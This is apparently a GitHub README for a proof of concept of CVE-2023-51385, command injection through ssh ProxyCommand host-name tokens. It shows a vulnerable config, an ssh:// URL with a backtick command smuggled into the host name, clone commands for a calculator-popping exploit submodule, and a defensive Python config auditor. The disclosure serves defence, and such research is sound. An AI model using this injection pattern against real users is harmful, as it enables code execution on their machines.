thinkliving2020/CVE-2023-51385-
# RCE via insecure ~/.ssh/config

Use of tokens like `%h` and `%p` in `ProxyCommand` is quite popular for setting up tunnels and connection proxying using SSH.

## Vulnerable config

```
host *.example.com
  ProxyCommand /usr/bin/nc -X connect -x 192.0.2.0:8080 %h %p
```

Note: in my initial assessment I was under the impression that using `'%h'` (single quotes) would avoid this, but looks like that is still going to be vulnerable with something like:

```
ssh://`echo helloworld` > cve.txt`foo.example.com/bar
```

Taken from: https://man.openbsd.org/ssh_config#ProxyCommand

## What is in this repository

A submodule which would exploit this vulnerability to pop a calculator on OSX.

Try it out using:

```
git clone https://github.com/vin01/poc-proxycommand-vulnerable --recurse-submodules
```

or

```
git clone git@github.com:vin01/poc-proxycommand-vulnerable.git --recurse-submodules
```
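A defensive check for the pattern described above, as an added example that is not part of this repository: it flags `ProxyCommand` and `LocalCommand` lines that expand a host or user name token into a shell command, and validates a name before a wrapper script hands it to `ssh`. The function names, the `SAFE_NAME` allowlist and the sample config are assumptions made for illustration.

```python
import re

# ssh passes the argument of these directives to the user's shell.
SHELL_DIRECTIVES = {"proxycommand", "localcommand"}
# Tokens that expand to a remote host or user name (TOKENS in ssh_config(5)).
NAME_TOKENS = re.compile(r"%[hnr]")
# Assumption: a conservative allowlist for names a wrapper hands to ssh,
# not the exact rule OpenSSH itself applies.
SAFE_NAME = re.compile(r"[A-Za-z0-9][A-Za-z0-9._-]*")


def audit_ssh_config(text):
    """Return (line_no, host_pattern, directive, tokens) for risky lines."""
    findings = []
    scope = "*"  # directives before any Host/Match line apply to every host
    for line_no, raw in enumerate(text.splitlines(), start=1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        # Keyword and argument are separated by whitespace and/or one '='.
        m = re.match(r"(\w+)\s*=?\s*(.*)", line)
        if not m:
            continue
        keyword, arg = m.group(1).lower(), m.group(2)
        if keyword in ("host", "match"):
            scope = arg
        elif keyword in SHELL_DIRECTIVES:
            # "%%" is a literal percent sign, so drop it before matching.
            tokens = sorted(set(NAME_TOKENS.findall(arg.replace("%%", ""))))
            if tokens:
                findings.append((line_no, scope, keyword, tokens))
    return findings


def is_safe_name(name):
    """True if a host or user name contains no shell metacharacters."""
    return SAFE_NAME.fullmatch(name) is not None


# Constructed sample: the config from this page plus an entry with no tokens.
SAMPLE_CONFIG = """\
# constructed sample
host *.example.com
  ProxyCommand /usr/bin/nc -X connect -x 192.0.2.0:8080 %h %p
host bastion
  ProxyCommand=ssh -W internal:22 jump
"""

if __name__ == "__main__":
    for finding in audit_ssh_config(SAMPLE_CONFIG):
        print(finding)
```

A flagged line is not automatically exploitable; it marks where a host name that arrives from untrusted input (a URL, a submodule path) should be rejected by `is_safe_name` before `ssh` is invoked.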